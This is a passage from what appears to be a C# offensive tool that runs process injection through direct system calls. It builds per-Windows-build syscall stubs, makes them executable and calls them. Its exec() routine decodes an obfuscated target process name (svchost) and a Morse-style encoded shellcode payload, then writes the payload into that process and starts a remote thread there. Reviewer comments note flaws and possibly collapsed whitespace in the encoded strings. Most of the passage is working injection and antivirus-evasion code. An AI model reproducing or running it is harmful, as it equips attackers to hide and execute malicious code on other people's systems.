public delegate NTSTATUS ZwAllocateVirtualMemoryX(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, ulong AllocationType, ulong Protect); 657 | 658 | [SuppressUnmanagedCodeSecurity] 659 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 660 | public delegate NTSTATUS ZwCreateThreadExX(out IntPtr threadHandle,uint desiredAccess,IntPtr objectAttributes,IntPtr processHandle,IntPtr lpStartAddress,IntPtr lpParameter,int createSuspended,uint stackZeroBits,uint sizeOfStackCommit,uint sizeOfStackReserve,IntPtr lpBytesBuffer); 661 | 662 | [SuppressUnmanagedCodeSecurity] 663 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 664 | public delegate NTSTATUS ZwCreateSectionX(ref IntPtr section, uint desiredAccess, IntPtr pAttrs, ref LARGE_INTEGER pMaxSize, uint pageProt, uint allocationAttribs, IntPtr hFile); 665 | 666 | [SuppressUnmanagedCodeSecurity] 667 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 668 | public delegate NTSTATUS ZwMapViewOfSectionX(IntPtr section, IntPtr process, ref IntPtr baseAddr, IntPtr zeroBits, IntPtr commitSize, IntPtr stuff, ref IntPtr viewSize, int inheritDispo, uint alloctype, uint prot); 669 | 670 | [SuppressUnmanagedCodeSecurity] 671 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 672 | public delegate NTSTATUS ZwProtectVirtualMemoryX(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 673 | 674 | [SuppressUnmanagedCodeSecurity] 675 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 676 | public delegate NTSTATUS ZwCreateProcessX( out IntPtr threadHandle, uint desiredAccess, IntPtr objectAttributes, IntPtr processHandle, bool InheritObjectTable, IntPtr SectionHandle, IntPtr DebugPort, IntPtr ExceptionPort); 677 | 678 | [SuppressUnmanagedCodeSecurity] 679 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 680 | public delegate NTSTATUS ZwOpenThreadX( IntPtr threadHandle, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref 
CLIENT_ID clientid); 681 | 682 | [SuppressUnmanagedCodeSecurity] 683 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 684 | public delegate NTSTATUS ZwResumeThreadX( IntPtr threadHandle, out ulong SuspendCount); 685 | 686 | 687 | public static NTSTATUS ZwOpenProcess(ref IntPtr hProcess, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid) 688 | { 689 | byte [] syscall = GetOSVersionAndReturnSyscall( 1 ); 690 | unsafe 691 | { 692 | fixed (byte* ptr = syscall) 693 | { 694 | IntPtr allocMemAddress = (IntPtr)ptr; 695 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 696 | MemoryProtection oldProtection; 697 | uint size = (uint)syscall.Length; 698 | IntPtr sizeIntPtr = (IntPtr)size; 699 | NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection ); 700 | ZwOpenProcessX ZwOpenProcessFunc = (ZwOpenProcessX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwOpenProcessX)); 701 | return (NTSTATUS)ZwOpenProcessFunc(out hProcess, processAccess, objAttribute, ref clientid); 702 | } 703 | 704 | } 705 | } 706 | 707 | public static NTSTATUS ZwCreateThreadEx(out IntPtr threadHandle, uint desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr lpStartAddress, IntPtr lpParameter, int createSuspended, uint stackZeroBits, uint sizeOfStackCommit, uint sizeOfStackReserve, IntPtr lpBytesBuffer) 708 | { 709 | byte [] syscall = GetOSVersionAndReturnSyscall( 2 ); 710 | unsafe 711 | { 712 | fixed (byte* ptr = syscall) 713 | { 714 | IntPtr allocMemAddress = (IntPtr)ptr; 715 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 716 | MemoryProtection oldProtection; 717 | uint size = (uint)syscall.Length; 718 | IntPtr sizeIntPtr = (IntPtr)size; 719 | NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out 
oldProtection ); 720 | ZwCreateThreadExX ZwCreateThreadExFunc = (ZwCreateThreadExX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCreateThreadExX)); 721 | return (NTSTATUS)ZwCreateThreadExFunc(out threadHandle, desiredAccess, objectAttributes, processHandle, lpStartAddress, lpParameter, createSuspended, stackZeroBits, sizeOfStackCommit, sizeOfStackReserve, lpBytesBuffer); 722 | } 723 | } 724 | } 725 | 726 | public static NTSTATUS ZwWriteVirtualMemory(IntPtr hProcess, ref IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten) 727 | { 728 | byte [] syscall = GetOSVersionAndReturnSyscall( 3 ); 729 | unsafe 730 | { 731 | fixed (byte* ptr = syscall) 732 | { 733 | IntPtr allocMemAddress = (IntPtr)ptr; 734 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 735 | MemoryProtection oldProtection; 736 | uint size = (uint)syscall.Length; 737 | IntPtr sizeIntPtr = (IntPtr)size; 738 | NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection ); 739 | ZwWriteVirtualMemoryX ZwWriteVirtualMemoryFunc = (ZwWriteVirtualMemoryX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwWriteVirtualMemoryX)); 740 | return (NTSTATUS)ZwWriteVirtualMemoryFunc(hProcess, lpBaseAddress, lpBuffer, nSize, ref lpNumberOfBytesWritten); 741 | } 742 | } 743 | } 744 | 745 | 746 | public static NTSTATUS ZwAllocateVirtualMemory(IntPtr hProcess, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, ulong AllocationType, ulong Protect) 747 | { 748 | byte [] syscall = GetOSVersionAndReturnSyscall( 4 ); 749 | unsafe 750 | { 751 | fixed (byte* ptr = syscall) 752 | { 753 | IntPtr allocMemAddress = (IntPtr)ptr; 754 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 755 | MemoryProtection oldProtection; 756 | uint size = (uint)syscall.Length; 757 | IntPtr sizeIntPtr = (IntPtr)size; 758 | NTSTATUS status = ZwProtectVirtualMemory( 
(IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection ); 759 | ZwAllocateVirtualMemoryX ZwAllocateVirtualMemoryFunc = (ZwAllocateVirtualMemoryX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwAllocateVirtualMemoryX)); 760 | return (NTSTATUS)ZwAllocateVirtualMemoryFunc(hProcess, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect); 761 | } 762 | } 763 | } 764 | 765 | public static NTSTATUS ZwCreateSection(ref IntPtr section, uint desiredAccess, IntPtr pAttrs, ref LARGE_INTEGER pMaxSize, uint pageProt, uint allocationAttribs, IntPtr hFile) 766 | { 767 | byte [] syscall = GetOSVersionAndReturnSyscall( 5 ); 768 | unsafe 769 | { 770 | fixed (byte* ptr = syscall) 771 | { 772 | IntPtr allocMemAddress = (IntPtr)ptr; 773 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 774 | MemoryProtection oldProtection; 775 | uint size = (uint)syscall.Length; 776 | IntPtr sizeIntPtr = (IntPtr)size; 777 | NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection ); 778 | ZwCreateSectionX ZwCreateSectionFunc = (ZwCreateSectionX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCreateSectionX)); 779 | return (NTSTATUS)ZwCreateSectionFunc(ref section, desiredAccess, pAttrs, ref pMaxSize, pageProt, allocationAttribs, hFile); 780 | } 781 | } 782 | } 783 | 784 | public static NTSTATUS ZwMapViewOfSection(IntPtr section, IntPtr process, ref IntPtr baseAddr, IntPtr zeroBits, IntPtr commitSize, IntPtr stuff, ref IntPtr viewSize, int inheritDispo, uint alloctype, uint prot) 785 | { 786 | byte [] syscall = GetOSVersionAndReturnSyscall( 6 ); 787 | unsafe 788 | { 789 | fixed (byte* ptr = syscall) 790 | { 791 | IntPtr allocMemAddress = (IntPtr)ptr; 792 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 793 | MemoryProtection oldProtection; 794 | uint size = 
(uint)syscall.Length;
                IntPtr sizeIntPtr = (IntPtr)size;
                // Tail of ZwMapViewOfSection: flip the stub page to RWX (result unchecked),
                // bind a delegate to it and call.
                NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection );
                ZwMapViewOfSectionX ZwMapViewOfSectionFunc = (ZwMapViewOfSectionX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwMapViewOfSectionX));
                return (NTSTATUS)ZwMapViewOfSectionFunc(section, process, ref baseAddr, zeroBits, commitSize, stuff, ref viewSize, inheritDispo, alloctype, prot);
            }
        }
    }

    // Direct-syscall wrapper for ZwCreateProcess (stub index 7 in GetOSVersionAndReturnSyscall).
    // Same construction as every Zw* wrapper in this class: stub bytes in a managed byte[],
    // page switched to execute-read-write via ZwProtectVirtualMemory (result in 'status' never
    // checked, 'oldProtection' never restored), call through a delegate built from the raw
    // pointer. Not referenced by exec() in this listing.
    // NOTE(review): the first parameter is named 'threadHandle' although this call produces a
    // process handle — presumably carried over from ZwCreateThreadEx.
    public static NTSTATUS ZwCreateProcess( out IntPtr threadHandle, uint desiredAccess, IntPtr objectAttributes, IntPtr processHandle, bool InheritObjectTable, IntPtr SectionHandle, IntPtr DebugPort, IntPtr ExceptionPort)
    {
        byte [] syscall = GetOSVersionAndReturnSyscall( 7 );
        unsafe
        {
            fixed (byte* ptr = syscall)
            {
                IntPtr allocMemAddress = (IntPtr)ptr;
                IntPtr allocMemAddressCopy = (IntPtr)ptr;
                MemoryProtection oldProtection;
                uint size = (uint)syscall.Length;
                IntPtr sizeIntPtr = (IntPtr)size;
                NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection );
                ZwCreateProcessX ZwCreateProcessFunc = (ZwCreateProcessX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCreateProcessX));
                return (NTSTATUS)ZwCreateProcessFunc(out threadHandle, desiredAccess, objectAttributes, processHandle, InheritObjectTable, SectionHandle, DebugPort, ExceptionPort);
            }
        }
    }

    // Direct-syscall wrapper for ZwOpenThread (stub index 8); same construction and caveats as
    // ZwCreateProcess above. Not referenced by exec() in this listing. 'threadHandle' is taken
    // by value here, so the caller never receives the handle this call produces.
    public static NTSTATUS ZwOpenThread( IntPtr threadHandle, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid)
    {
        byte [] syscall = GetOSVersionAndReturnSyscall( 8 );
        unsafe
        {
            fixed (byte* ptr = syscall)
            {
                IntPtr
allocMemAddress = (IntPtr)ptr;
                IntPtr allocMemAddressCopy = (IntPtr)ptr;
                MemoryProtection oldProtection;
                uint size = (uint)syscall.Length;
                IntPtr sizeIntPtr = (IntPtr)size;
                // Tail of ZwOpenThread: make the stub page RWX (result unchecked), bind and call.
                NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection );
                ZwOpenThreadX ZwOpenThreadFunc = (ZwOpenThreadX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwOpenThreadX));
                return (NTSTATUS)ZwOpenThreadFunc(threadHandle, processAccess, objAttribute, ref clientid);
            }

        }
    }

    // Direct-syscall wrapper for ZwResumeThread (stub index 9 in GetOSVersionAndReturnSyscall).
    // Same construction as every Zw* wrapper in this class: stub bytes in a managed byte[], page
    // switched to execute-read-write via ZwProtectVirtualMemory ('status' never checked,
    // 'oldProtection' never restored), call through a delegate built from the raw pointer.
    // Not referenced by exec() in this listing.
    public static NTSTATUS ZwResumeThread( IntPtr threadHandle, out ulong SuspendCount)
    {
        byte [] syscall = GetOSVersionAndReturnSyscall( 9 );
        unsafe
        {
            fixed (byte* ptr = syscall)
            {
                IntPtr allocMemAddress = (IntPtr)ptr;
                IntPtr allocMemAddressCopy = (IntPtr)ptr;
                MemoryProtection oldProtection;
                uint size = (uint)syscall.Length;
                IntPtr sizeIntPtr = (IntPtr)size;
                NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection );
                ZwResumeThreadX ZwResumeThreadFunc = (ZwResumeThreadX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwResumeThreadX));
                return (NTSTATUS)ZwResumeThreadFunc(threadHandle, out SuspendCount);
            }

        }
    }

    // Entry point the README invokes through rundll32. Sequence: decode the obfuscated target
    // process name and payload bytes, pick the first process with that name owned by the current
    // user, then open it, allocate an execute-read-write region inside it, copy the bytes in and
    // start a remote thread at that address. This is the classic remote-thread injection chain,
    // expressed through the direct-syscall wrappers in this class; the cross-process handle
    // opened with ProcessAccessFlags.All, the remote RWX allocation and the remote thread start
    // in non-image memory are the steps a defender would expect to see logged.
    // NOTE(review): no Zw* return value is examined, so a failure at any step cascades into the
    // next call with a zero handle/address; FindUserPID's "not found" result (0) is likewise
    // passed straight into CLIENT_ID.UniqueProcess.
    // NOTE(review): both decoders below count consecutive spaces, but this rendering shows only
    // single spaces — the listing's whitespace looks collapsed, so the literals as shown here
    // may not decode as the author intended; verify against the original source.
    public static void exec()
    {
        // name = svchost
        string name = " ? ? ? ? ? ? ?";
        // Morse is shellcode, start calc
        string Morse = "-/ / ? /-/ ?-/ / ? / / ? / / ? / / ? / / ? / / ? / / ? / / ?-/ / ? / / ?-/-/ ? / / ? / / ? / / ? / / ?-/ / ? / / ? / / ? / / ? / / ?-/ / ?-/ / ? /-/ ? / / ? / / ?-/ / ?-/ / ?-/ / ?-/ / ?-/ / ?-/ / ? / / ? / / ? / / ? / / ? / / ? / / ?-/ / ? / / ?-/ / ? / / ? / / ?-/ / ?-/ / ? / / ? / / ? / / ? / / ?-/ / ? / / ? / / ? / / ? / / ? / / ? / / ? / / ? / / ?-/ / ? / / ?-/-/ ? / / ? / / ? / / ?-/ / ?-/ / ?-/ / ? / / ?-/-/ ? / / ? / / ? / / ?-/ / ?-/ / ? /-/ ? / / ? / / ?-/ / ? / / ? / / ? / / ? / /-? / / ? / / ? / / ?-/ /-? / / ? / / ? / / ?-/ / ?-/ / ? / / ? / /-? / / ?-/ / ?-/ / ? /-/ ?-/ /-?-/ / ?-/ / ? /-/ ?-/ / ? / / ? / / ? / / ?-/ / ? / / ? / / ? / /-? / / ? / / ? / / ? / /-?-/ / ? / /-?-/ / ?-/ /-? / / ? / / ? / / ? / / ?-/ / ? / / ?-/ / ? / / ? / / ? / / ? / / ?-/ /-?-/ / ? / / ? / / ? / / ? / / ?-/ / ? / / ? / / ?-/ / ?-/ / ?-/ /-? /-/ ? / /-? / / ?-/ / ?-/ / ?-/ /-? / / ? / /-?-/-/ ? / /-? / / ?-/ / ? / / ? / /-? / / ? / / ? / / ?-/ /-? / / ? / / ?-/-/ ? / /-?-/ / ? / / ? / / ?-/ / ? / / ?-/ / ? / / ? / / ? / / ? /-/ ? / / ? / / ? / / ? / / ? / / ? / / ?-/ / ?-/ / ? / /-? / / ?-/ / ? / / ? / / ?-/ / ?-/ / ?-/ /-? / / ? / / ?-/ / ? / / ? / /-?-/ / ? / / ? / / ? / /-? / / ? / / ?-/-/ ? / / ? / / ?-/ /-?-/ /-? / / ? / / ?-/-/ ? / / ? / / ?-/ /-? / /-? / / ? / / ? / / ? / /-? / / ? / / ?-/-/ ? / / ? / / ? / / ? / / ?-/ / ? / / ? / / ?-/ / ? /-/ ?-/ / ? / /-? / / ? / / ? / / ? / /-? / / ?-/ / ?-/ / ? / / ?-/-/ ?-/ /-?-/ / ? / / ?-/ / ? / /-? /-/ ? / / ? / / ? / / ? / / ? / / ?-/ / ?-/ / ? / / ?-/-/ ? / / ? / / ? / / ? / / ?-/ / ? / / ? / / ? / / ? / / ? / / ?-/ / ?-/ / ? / / ? / / ?-/ / ? / / ? / / ? / / ? / / ? / / ? / / ? / / ? / / ?-/ / ?-/-/ ?-/-/ ? / / ?-/ / ? / / ?-/ /-? / / ? / /-? / / ? / / ?-/ / ?-/ / ? / / ?-/ / ? /-/ ?-/ / ? / / ? / / ? / / ? / / ?-/ / ?-/ / ? / / ? /-/ ? / / ?-/ / ?-/ / ?-/ / ?-/ /-?-/ / ? / / ? / / ? / / ?";
        // Target selection: first process with the decoded name that belongs to this user.
        int ProcId = FindUserPID( ResolvProcessName(name) );
        byte [] scode = ResolveShellCode(Morse);
        CLIENT_ID clientid = new CLIENT_ID();
        clientid.UniqueProcess = new IntPtr(ProcId);
        clientid.UniqueThread = IntPtr.Zero;
        IntPtr byteWritten = IntPtr.Zero;
        IntPtr procHandle = IntPtr.Zero;
        // Full-access handle to the target; return value ignored.
        ZwOpenProcess(ref procHandle, ProcessAccessFlags.All, new OBJECT_ATTRIBUTES(), ref clientid);
        IntPtr allocMemAddress = new IntPtr();
        UIntPtr scodeSize = (UIntPtr)(UInt32)scode.Length;
        // Committed RWX region in the target sized to the payload; return value ignored.
        ZwAllocateVirtualMemory(procHandle, ref allocMemAddress, new IntPtr(0), ref scodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        // Stage the bytes in unmanaged memory so the write can take a plain pointer.
        IntPtr unmanagedPointer = Marshal.AllocHGlobal(scode.Length);
        Marshal.Copy(scode, 0, unmanagedPointer, scode.Length);
        ZwWriteVirtualMemory(procHandle, ref allocMemAddress, unmanagedPointer, (UInt32)(scode.Length), ref byteWritten);
        Marshal.FreeHGlobal(unmanagedPointer);
        IntPtr hRemoteThread;
        // Remote thread started at the freshly written region; return value ignored.
        ZwCreateThreadEx(out hRemoteThread, GENERIC_ALL, IntPtr.Zero, procHandle, allocMemAddress, IntPtr.Zero, 0, 0, 0, 0, IntPtr.Zero);
        CloseHandle(hRemoteThread);
        CloseHandle(procHandle);
    }

    // Decodes the obfuscated process name: the input is runs of spaces each terminated by '?',
    // and the length of each run selects one letter from a fixed six-letter table (the author's
    // comment in exec() gives the plaintext). A '?' after an unlisted run length appends nothing
    // and leaves 'num' untouched; any other character is re-read until the loop counter runs out.
    // NOTE(review): this only works if the literal keeps its exact run lengths — a copy with
    // collapsed whitespace decodes to "".
    public static string ResolvProcessName(string c)
    {
        string result = "";
        int num = 0;
        int index = 0;
        string tmp = "";
        for (int i = 1; i <= c.Length; i++) {
            tmp = c.Substring(index, 1);
            if (tmp == " ") { num++; index++; }
            else if (tmp == "?") {
                if (num == 19) { result = result + "s"; num = 0; }
                else
                if (num == 22) { result = result + "v"; num = 0; }
                else
                if (num == 3) { result = result + "c"; num = 0; }
                else
                if (num == 8) { result = result + "h"; num = 0; }
                else
                if (num == 15) { result = result + "o"; num = 0; }
                else
                if (num == 20) { result = result + "t"; num = 0; }
                index++;
            }
        }
        return result;
    }

    // Decodes the author's "Morse" text encoding of the payload into bytes: spaces are counted,
    // '/' or '|' flushes the count as a decimal digit, '-' contributes a '0', and each '?' closes
    // one byte (Byte.Parse of the accumulated digits). Grows the result one element per byte
    // with Array.Resize. A '?' at index 0 would throw (Substring(_N3 - 1, 1)).
    public static
byte [] ResolveShellCode(string _P1)
    {
        // _L1: output bytes (grown with Array.Resize); _N1: pending space count;
        // _N2: decimal digits accumulated for the current byte; _N3: read cursor;
        // _N4: number of bytes emitted so far.
        byte [] _L1 = new byte [1];
        int _N1 = 0;
        string _N2 = "";
        int _N3 = 0;
        int _N4 = 0;
        for (int i = 1; i <= _P1.Length; i++) { if (_P1.Substring(_N3, 1) == " ") { _N1++; }
            // '/' or '|': flush the space run as one decimal digit.
            else if (_P1.Substring(_N3, 1) == "|" || _P1.Substring(_N3,1) == "/") { if (_N1 > 0) { _N2 = _N2 + _N1.ToString(); _N1 = 0; } }
            // '-': literal zero digit.
            else if (_P1.Substring(_N3, 1) == "-") { _N2 = _N2 + "0"; _N1 = 0; }
            // '?': end of byte. If the previous character already closed the digits ('?' or '-')
            // the accumulated string is parsed as-is, otherwise the pending space run is the last
            // digit. Note the look-behind throws when '?' is the very first character.
            else if (_P1.Substring(_N3, 1) == "?") { if (_P1.Substring(_N3 - 1, 1) == "?" || _P1.Substring(_N3 - 1, 1) == "-")
                {
                    Array.Resize(ref _L1, _N4 + 1);
                    _L1[_N4] = Byte.Parse( _N2 );
                    _N2 = "";
                    _N1 = 0;
                    _N4++;
                }
                else {
                    Array.Resize(ref _L1, _N4 + 1);
                    _L1[_N4] = Byte.Parse( _N2 + _N1.ToString() );
                    _N2 = "";
                    _N1 = 0;
                    _N4++;
                } }
            _N3++;
        }
        return _L1;
    }

    // Returns the account name (domain prefix stripped) that owns 'process', or null on any
    // failure. Opens the process token through the ZwOpenProcessToken wrapper with desired
    // access 8 and wraps it in a WindowsIdentity; the token handle is closed in 'finally'.
    // NOTE(review): the bare 'catch' swallows every exception type, including the ones that
    // indicate the token could not be opened at all.
    private static string GetProcessUser(Process process)
    {
        IntPtr processHandle = IntPtr.Zero;
        try
        {
            ZwOpenProcessToken(process.Handle, 8, out processHandle);
            WindowsIdentity wi = new WindowsIdentity(processHandle);
            string user = wi.Name;
            // Drop the "DOMAIN\" prefix so the result compares with Environment.UserName.
            return user.Contains(@"\") ?
user.Substring(user.IndexOf(@"\") + 1) : user;
        }
        catch
        {
            // Any failure (token open, identity construction) is reported as "unknown owner".
            return null;
        }
        finally
        {
            if (processHandle != IntPtr.Zero)
            {
                CloseHandle(processHandle);
            }
        }
    }


    // Returns the id of the first process named 'procName' (exact, case-sensitive match on
    // Process.ProcessName) whose owner equals Environment.UserName, or 0 when none matches.
    // Callers cannot distinguish "not found" from a real pid of 0.
    // NOTE(review): Process.GetProcessById re-opens a process already held in 'process', and
    // neither Process object is disposed.
    public static int FindUserPID(string procName)
    {
        string owner;
        Process proc;
        int foundPID = 0;
        Process[] processList = Process.GetProcesses();
        foreach (Process process in processList)
        {
            if (process.ProcessName == procName) {
                proc = Process.GetProcessById(process.Id);
                owner = GetProcessUser(proc);
                if (owner == Environment.UserName ) {
                    foundPID = process.Id;
                    break;
                }
            }
        }
        return foundPID;
    }


    // Builds the 11-byte direct-syscall stub for the wrapper selected by 'sysType' (1..10, see
    // the case labels) on the running Windows build. The stub starts from a fixed seed array and
    // each case adds a per-byte constant to it; the cases differ only in the per-function
    // constant(s), and the (byte) cast silently truncates constants above 0xFF. The build number
    // comes from RtlGetVersion (its NTSTATUS, 'OSdata', is never checked).
    // NOTE(review): dwPlatformId == 2 is VER_PLATFORM_WIN32_NT, which every modern client *and*
    // server system reports; the "Server OS" branch below is empty. On any build not listed here
    // (or an unknown 'sysType') the seed array is returned unmodified, and the Zw* wrappers
    // execute it as-is without checking.
    public static byte [] GetOSVersionAndReturnSyscall(int sysType )
    {
        var syscall = new byte [] { 001, 001, 001, 001, 001, 000, 000, 000, 001, 001, 001 };
        var osVersionInfo = new OSVERSIONINFOEXW { dwOSVersionInfoSize = Marshal.SizeOf(typeof(OSVERSIONINFOEXW)) };
        NTSTATUS OSdata = RtlGetVersion(ref osVersionInfo);

        if (osVersionInfo.dwPlatformId == 2) // Client OS
        {
            // Windows 10 1903 / 1909.
            if (osVersionInfo.dwBuildNumber == 18362 || osVersionInfo.dwBuildNumber == 18363 )
            {
                switch (sysType)
                {
                    case 1: // ZwOpenProcess
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x25);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 2: // ZwCreateThreadEx
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0xBC);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 3: // ZwWriteVirtualMemory
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x39);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 4: // ZwAllocateVirtualMemory
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x17);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0e);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 5: // ZwCreateSection
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x49);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 6: // ZwMapViewOfSection
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x27);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 7: // ZwCreateProcess
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
